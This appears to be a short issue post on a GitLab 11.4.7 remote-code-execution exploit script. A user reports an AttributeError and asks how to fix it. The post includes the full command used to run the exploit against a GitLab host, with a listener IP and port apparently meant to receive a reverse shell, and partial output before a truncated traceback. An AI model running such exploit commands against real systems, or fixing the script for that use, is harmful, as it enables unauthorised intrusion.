GitLab-11.4.7-RCE
GitLab-11.4.7-RCE copied to clipboard
AttributeError: 'NoneType' object has no attribute 'get'
Dear author, I got an error when using it.
[root@www wwwroot]# python3 1.py -u jiehou -p Aa123456 -g "http://10.10.10.1" -l 192.168.0.1 -P 7777
[+] authenticity_token: pnI5HqNUSxQxsmH4IyDX8g+S+YumbeZhrkE3GeRs2NXK1XqD1CAZc6EVWMO4P6ZkKrJSd75NeO4/nE1SWdf+Og==
[+] Creating project with random name: project8247
Traceback (most recent call last):
File "1.py", line 67, in
How should this be solved?